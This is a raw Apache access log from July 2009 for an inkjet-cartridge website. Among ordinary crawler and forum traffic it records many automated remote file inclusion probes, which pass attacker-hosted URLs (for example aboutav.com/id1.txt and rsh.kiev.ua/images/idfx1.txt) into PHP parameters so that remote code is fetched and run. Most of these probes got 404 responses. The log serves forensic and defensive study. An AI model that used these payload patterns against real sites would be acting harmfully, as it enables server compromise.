72.30.142.250 - - [01/Jul/2009:04:15:04 -0700] "GET /phpbb/viewtopic.php?t=431&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:04:16:22 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:04:16:54 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.157.4.105 - - [01/Jul/2009:04:17:07 -0700] "GET /phpbb/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Nokia6070/2.0 (04.22) Profile/MIDP-2.0 Configuration/CLDC-1.1 Novarra-Vision/7.3" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:04:18:30 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:04:18:30 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:04:18:30 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:04:20:24 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:04:20:24 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:04:20:24 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:21:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:21:24 -0700] "GET /phpbb/viewtopic.php?p=2360 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:21:35 -0700] "GET /phpbb/viewtopic.php?p=3000 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:21:47 -0700] "GET /phpbb/viewtopic.php?p=3018 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:21:58 -0700] "GET /phpbb/viewtopic.php?p=3026 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:22:09 -0700] "GET /phpbb/viewtopic.php?p=4221 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:22:24 -0700] "GET /phpbb/viewtopic.php?p=4439 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:22:33 -0700] "GET /phpbb/viewtopic.php?p=4761 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:22:46 -0700] "GET /phpbb/viewtopic.php?p=5137 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:04:23:01 -0700] "GET /phpbb/viewtopic.php?p=5150 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:04:27:36 -0700] "GET /logs/access_090331.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:04:27:37 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:04:27:41 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:04:29:30 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:04:29:30 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:04:29:30 -0700] "GET /logs/scripts.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:04:32:58 -0700] "GET /logs/scripts.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:04:38:47 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:04:38:47 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:04:38:47 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.94.56.39 - - [01/Jul/2009:04:44:03 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.40.150.211 - - [01/Jul/2009:04:48:52 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.zorgno.it/genealogy/LICENSE.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "site.inkjetcartridge.com"
216.254.103.223 - - [01/Jul/2009:04:48:54 -0700] "GET /logs/scripts.log%20%20//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.254.103.223 - - [01/Jul/2009:04:48:54 -0700] "GET /include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.254.103.223 - - [01/Jul/2009:04:48:54 -0700] "GET /logs//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.233.11.27 - - [01/Jul/2009:04:53:54 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:00:11 -0700] "GET /logs/scripts.log%20%20//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:00:11 -0700] "GET /logs//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:00:11 -0700] "GET /include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.233.11.27 - - [01/Jul/2009:05:02:18 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
211.233.11.27 - - [01/Jul/2009:05:02:22 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
211.233.11.27 - - [01/Jul/2009:05:02:25 -0700] "GET /bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
124.0.145.1 - - [01/Jul/2009:05:03:14 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.0.145.1 - - [01/Jul/2009:05:03:14 -0700] "GET /include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.0.145.1 - - [01/Jul/2009:05:03:14 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:03:19 -0700] "GET /logs//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:03:19 -0700] "GET /include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:03:19 -0700] "GET /logs/scripts.log%20%20//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:05:06:41 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
124.0.145.1 - - [01/Jul/2009:05:07:49 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.233.11.27 - - [01/Jul/2009:05:09:39 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
208.69.225.2 - - [01/Jul/2009:05:09:52 -0700] "GET /email/images/inkmail13_03.gif HTTP/1.1" 200 15936 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090302 Thunderbird/2.0.0.21" "site.inkjetcartridge.com"
208.69.225.2 - - [01/Jul/2009:05:09:52 -0700] "GET /email/images/inkmail13_06.gif HTTP/1.1" 200 26778 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090302 Thunderbird/2.0.0.21" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:10:31 -0700] "GET /logs/access.log//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:10:35 -0700] "GET /logs/access.log//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
60.43.229.5 - - [01/Jul/2009:05:10:58 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
60.43.229.5 - - [01/Jul/2009:05:10:58 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
60.43.229.5 - - [01/Jul/2009:05:10:59 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
60.43.229.5 - - [01/Jul/2009:05:11:13 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:12:36 -0700] "GET /logs/scripts.log//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
196.25.27.90 - - [01/Jul/2009:05:13:49 -0700] "GET /logs/scripts.log//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.52.143.34 - - [01/Jul/2009:05:15:06 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "site.inkjetcartridge.com"
81.52.143.34 - - [01/Jul/2009:05:15:15 -0700] "GET /links/links.html HTTP/1.1" 200 19496 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:05:15:53 -0700] "GET /bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:05:16:43 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
211.233.11.27 - - [01/Jul/2009:05:19:28 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:05:19:43 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.165.73.157 - - [01/Jul/2009:05:21:28 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.165.73.157 - - [01/Jul/2009:05:21:28 -0700] "GET /?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 200 2132 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.165.73.157 - - [01/Jul/2009:05:21:28 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 200 1224 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
89.149.244.84 - - [01/Jul/2009:05:22:03 -0700] "GET /phpbb/posting.php?mode=reply&t=176 HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/viewtopic.php?t=176&start=300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
200.109.204.219 - - [01/Jul/2009:05:22:05 -0700] "POST /phpbb/posting.php HTTP/1.0" 200 518 "http://site.inkjetcartridge.com/phpbb/posting.php?mode=reply&t=176" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
211.233.11.27 - - [01/Jul/2009:05:25:42 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
211.233.11.27 - - [01/Jul/2009:05:25:51 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
121.165.73.157 - - [01/Jul/2009:05:25:52 -0700] "GET /logs/scripts.log/?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
211.233.11.27 - - [01/Jul/2009:05:26:05 -0700] "GET /bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
121.165.73.157 - - [01/Jul/2009:05:28:44 -0700] "GET /logs/access.log%20/?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:35:35 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:35:35 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:35:35 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:35:49 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:35:49 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:35:51 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:35:52 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:35:52 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:35:53 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:06 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:06 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:08 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:12 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:12 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:14 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:15 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:16 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:19 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:29 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:29 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:29 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:39 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:39 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:41 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:47 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:47 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:47 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:53 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:53 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:05:36:54 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
